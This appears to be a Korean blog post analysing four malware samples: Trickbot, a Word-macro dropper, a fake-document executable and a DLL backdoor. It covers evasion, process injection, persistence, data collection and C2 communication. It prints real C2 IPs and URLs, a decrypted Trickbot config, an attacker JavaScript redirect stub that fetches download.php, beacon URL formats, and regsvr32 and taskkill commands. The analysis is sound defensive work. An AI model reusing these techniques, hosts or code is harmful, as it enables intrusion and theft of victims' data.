jjun2e

File name: MfcTTT.exe

MD5: a2019144b76733cf5ef0e7f2dd13e4c5

Size: 563,505 byte

Emotet과 연관성이 있는 Trickbot을 분석한다.

1.  해당 파일 리소스영역에는 실제 사용하게 될 API, 경로 및 파일 이름 등을 가지고 있다.

  - "GetModuleFileNameW", "LayvXBcOppdgzCgnncA", "ShellExecuteW", "C:\ \ ProgramData\ \ аНао"ｷ"ﾍ래별.exe"...

2. Dummy Code를 지나 EAT에 존재하는 함수에서 악성행위가 시작된다. 리소스 영역에서 문자열들을 불러와 자가복제 및 프로세스를 실행시킨다.

  - EAT Function : "LayvXBcOppdgzCgnncA“

  - 자가복제 : C:\ ProgramData\ аНаоすは래별.exe

3. 현재 프로세스가 자가복제 된 프로세스인지 확인 후 분기를 나눈다.

4. 코드의 로직은 코드패치를 통해 유동적으로 변경이되고 패치 후 특정 주소값을 호출해 행위를 이어간다.

   - 코드 패치 = ebp+8

   - 악성 행위 = ebp+14

5.  explorer.exe를 system32 내부 디렉토리에서 검색 후 경로와 합쳐준다. 실제 행위는 explorer.exe를 사용하지 않는다.

6. UAC 우회와 관리자 권한으로 실행하기 위해 COM Interface를 활용하며 CLSID값과 IID값을 구하고 CoGetObject API를 호출 시켜 객체를 넘겨 받는다.

   - CLSID: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}

   - IID: {6EDD6D74-C007-4E75-B76A-E5740995E24C}

7. 현재 자신의 프로세스가 관리자 권한으로 생성이 되었는지를 검사하고 분기를 나눈다.

8. 여러번의 분기를 통해 이전에 받아 두었던 COM Interface 객체 값으로 svchost.exe 프로세스를 Suspend 상태로 실행시킨다.

9. svchost.exe를 실행 이후 악성행위는 백신 우회 및 안티 디버깅에 사용되는 “Haven’s Gate”기법이 사용된다.

“call far [33]:offset” 명령어를 통해 native 64bit system call을 하여 native 64bit system에서 실행된다.

그림 출처: https://www.studocu.com/row/document/v-a-graiciuno-aukstoji-vadybos-mokykla/education/lecture-notes/malware-collection/4472699/view

10. svchost.exe 프로세스의 내부 메모리를 읽어오고 1000byte를 지우고 해당 주소값에 코드패치를 진행한다.

11. 타겟 프로세스인 svchost.exe의 코드 패치를 통해 기존에 존재하는 “wmainCRTStarup” 함수의 로직을 변경한다. 

패치 전	패치 후

12. 코드패치 이후 Suspend 되어 있던 svchost.exe 프로세스 상태를 Resume 시켜준다.

13. 프로세스 중복 방지를 위해 뮤텍스를 생성한다.

- “Global\812B46B81AE10”

14. 자가복제를 위한 디렉터리를 생성하고 원본파일을 복사 시킨다.

- ~%APPDATA%\NuiGet\аНаоすは래별.exe

15. “rdtsc” 명령어를 통해 현재 CPU의 클럭(코드의 실행시간)을 측정해 시간차 계산을 통해 안티 리버싱을 탐지하고 분기를 나눈다. 

  - 2st CPU 클럭 - 1st CPU 클럭

16. 작업스케줄러의 복제되었던 자기 자신을 등록시키고 시스템 시작 시 재실행이 되게 한다. 

  - 이름: Download http service

  - 실행 계정: SYSTEM

17. 작업 스케줄러로 등록해 두었던 작업을 XML 파일에서 SYSTEM 권한으로 등록이 되어 있는지 확인한다.

18. ECC 암호화 key와 AES 암호화 key를 생성한다. 데이터 암호화에는 ECC key가 활용되고 데이터 복호화에는 AES key를 사용한다.

19. 해당 주소에는 암호화가 되어있는 값들이 존재하고, 이전에 생성했던 AES Key값으로 복호화를 진행하고 그 값에는 gtag와 C2의 IP가 존재한다. 

복호화 전	복호화 후

<mcconf>
<ver>1000480</ver>
<gtag>ono23</gtag>
<servs><srv>144.91.79.9:443</srv>
<srv>172.245.97.148:443</srv>
<srv>85.204.116.139:443</srv>
<srv>185.62.188.117:443</srv>
... 생략

20. 나열된 C2서버들을 순차적으로 GET 요청을 통해 연결을 시도하고 이전에 수집했던 사용자의 컴퓨터이름,OS버전을 파라미터로 합친다. 

   - \gtag\컴퓨터이름_OS버전\5\spk\

결론 

Emotet과 연관성이 있는 Trickbot을 분석하였지만 실제 C2 서버가 정상 사이트로 복구가 된 상태이거나, 서버가 오프라인 상태이므로 Trickbot의 Module을 받아오지 못했다. Trickbot의 특징은 다른 변종들도 마찬가지이며 “Haven’s Gate” 기법을 사용하는 걸 알게 되었다. 이 기법을 통해 User level 에서의 디버거로 제어를 하지 못하게 되므로 Windbg로 분석을 진행했다.

Haven's Gate 참고 자료

malwareanalysis.tistory.com/54

m.blog.naver.com/PostView.nhn?blogId=aepkoreanet&logNo=221581461165&proxyReferer=https:%2F%2Fwww.google.com%2F

blog.talosintelligence.com/2019/07/rats-and-stealers-rush-through-heavens.html

MD5: 68b984c9b809ffecf96bb491e6d3d18a1f46c3a23cc4ed43c2a516a53ecb8aee

NAME: AF9919705489DL.doc

SIZE: 172,686 byte

MD5: B50565651A1701AA7C3BDF2B925ADDAE

NAME: J3sat8nxa.exe

SIZE: 258,048 byte

C2: [50.121.220.50, 54.37.42.48, 51.75.33.122]

1. AF9919705489DL.doc

1) 원본파일은 doc파일이며 내부의 VB script가 삽입 되어있고 난독화 된 문자열을 내부로직을 통해 복호화를 시킨다.

2) VB Script 내에는 없지만 문서 내의 숨겨두었던 Powershell payload도 같은 방식으로 복호화를 진행한다.

3) Base64 디코딩을 하고 패킷을 숨기기위해 TLS 통신을 하고 아래의 URL에서 PE를 다운로드 후 실행한다.

 - Drop : %userprofile%\yeDzbq5\PF2qP2U\J3sat8nxa.exe

2.  J3sat8nxa.exe

1) Dummy Code를 지나면 Virtualalloc 함수를 통해 공간을 할당하고 data 섹션의 내부 PE를 배치 시킨다.

2) PE 배치 이후  ~\System32\ 내부의 파일명들을 전부 수집을 하고 확장자를 제거 후 메모리에 저장시킨다.

   - C:\\Windows\\System32\\

3) 경로를 구하기 전 연산을 통해 결과 값을 구하고 그 결과 값으로 이전에 수집해 두었던 파일명을 추출한다.

   - 첫번째 경로: GetTickCount / 3 / 0x07A5

   - 두번째 경로: GetTickCount / 7 / 0x07A5

   - 전체 경로: %appdata%\local\[Random]\[Random]

4) 연산 경로의 자가복제를 시키고 이후 생성된 자가복제 파일을 실행 시킨다.

5) 자가복제 이후 악성행위가 시작이 된다 재부팅 이후 자동 재 시작을 위해 레지스트리에 등록을 한다.

  - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\[Randomfile]

6) 암호화를 하기 위해 Hash와 Key를 생성한다.

7) 감염자 PC의 정보를 수집한다.

  - 윈도우 디렉토리, 컴퓨터 이름, 볼륨 정보, 윈도우 버전, 부팅 시간, 프로세스 목록...

8) 감염자 PC의 수집된 데이터들을 이전에 만들어 두었던 Key로 암호화를 시킨다.

9) C2 통신을 하기 전 boundary 값을 구한다. 

   - GetTickCount *4 = %DWORD*4

10)boundary 값을 구하고 HTTP 메세지를 형성시킨다. 그 이후 암호화된 수집 데이터를 payload에 담아준다.

11) 공격자의 C2와 통신을 하기 전 HTTP Header를 구성하고 POST 파라미터로 수집된 정보를 전송시킨다. C2의 주소는 3개이며 순차적으로 전송을 시킨다.

12) 메모리를 할당하고 공격자의 C2로 부터 추가 파일을 다운로드 받는다.

13) 다운로드 된 바이너리는 난독화가 되어 있으며 C2로 전송하기전 사용했던 Key를 이용해 복호화를 진행시킨다.

현재 C2는 Alive 상태이며 추가 행위가 지속적으로 가능하다. 

MD5: 28833e121bb77c8262996af1f2aeef55

NAME: 28833e121bb77c8262996af1f2aeef55.exe

SIZE: 235,520byte

C2 : http://portable[.]epizy[.]com

# 워드 파일 아이콘으로 위장된 exe 파일이다.

# 흐름도

1. 실제 사용 될 API를 호출한다.

2. PE 내부의 "JUYFON" 이름의 리소스를 불러온다.

3. 리소스 데이터는 암호화가 되어 있고 포인터로 받은 리소스의 주소 내부 데이터를 0x7F 값과 xor 연산을 통해 복호화를 진행한다.

4. 복호화 이후 사용자를 속이기 위한 정상적인 워드 파일을 생성 후 실행시킨다.

4-1. 파일을 생성하기 전 인코딩이 되어 있는데 흔히 사용하는 UTF을 사용하지 않고 EUC-KR을 사용한다.

5. 쓰레드 동작 이후 wct.docx를 생성을 하고 cmd.exe의 호출로 PC의 정보 수집을 wct.docx 내부의 저장시킨다.

6. 정보 수집이 끝이나면 HTTP Header와 body를 제작한다. 

7. 제작이 완료 되면 추가적인 Header를 제작하고 POST 메소드를 이용해 정보 수집을 했던 wct.docx파일을 전송한다.

8. 전송이 끝나면 추가 악성 행위를 위해 /download.php? GET 파라미터로 php의 내용을 읽어오고 30분 간격으로 공격자의 C&C 주소와 통신을 수행한다.

<html>
<body>
<script type="text/javascript" src="/aes.js" ></script>
<script>function toNumbers(d){
var e=[];
d.replace(/(..)/g,function(d){
e.push(parseInt(d,16))});
return e}
function toHex(){
for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)
e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}
var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),
b=toNumbers("98344c2eee86c3994890592585b49f80"),
c=toNumbers("5fedac0a27a7bbe070d0bf687fe91ca0");
document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+";
expires=Thu, 31-Dec-37 23:55:55 GMT;path=/";
location.href="http://portable.epizy.com/img/png/download.php?filename=images01&i=1";</script>

# 읽어온 php

MD5: 2142739359fd0c614ffe3e2fcbc8c89d

NAME: AutoUpdate.dll

SIZE: 249,856

C2 : http://part[.]bigfile.pe.hu

# 흐름도

1. 레지스트리 등록

  - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

  - Key : [WindowsDefender]

  - Value : [regsvr32.exe /s “~\\Defender\\AutoUpdate.dll”]

2. bat 파일 드랍, 자가 삭제

  - %ProgramData%\temp\[RANDOM].tmp.bat

3. Mutex 생성 (중복방지)

  - <*IMPOSSIBLE*>

4-1. 암호화된 문자열 복호화 함수를 통해 복호화

4-2. 복호화 로직은 암호화된 문자열을 포인터로 담고 15E90 함수로 호출된 후 암호화된 문자열 1Byte를 Return 한다. 그 이후 "암호화된 문자열 ^ KEY ^ 암호화된 문자열[다음순번1Byte]" 연산을 반복하고 1Byte씩 암호화된 문자열의 위치를 변경해준다.

5. iexplore.exe 프로세스 종료

  - taskkill.exe /im iexplore.exe /f

6. iexplore.exe 프로세스 생성

  - C:\\Program Files\\internet explorer\\iexplore.exe

7.  iexplore.exe의 프로세스 검색 및 OpenProcess 함수를 통해 핸들을 얻은 후 Dll Injection

   - Injection to “~Autoupdate.dll -> iexplorer.exe ”

8. 감염 PC의 볼륨정보, OS정보 확인

9. 1분 간격으로 공격자의 C&C서버로 감염PC의 정보 전송

   - part.bigfile.pe.hu//?m=a&p1=[Volume Information]c&p2=[OS버전,시스템종류]-Dropper-v3108312

10. 공격자의 C&C서버로 다운로드될 파일의 hash를 URL의 포함시켜 요청하고 해당 파일이 존재할 경우 다운로드를 한다. 그 이후 tmp 파일로 저장되고 regsvr32.exe로 인해 추가 행위가 가능하다

   - part.bigfile.pe.hu//?m=e&p1=[Volume Information]c&p2=b&p3=File Hash

   - regsvr32.exe /s “[Random].tmp

변종마다 C2주소가 다르며 행위도 조금씩 틀리다.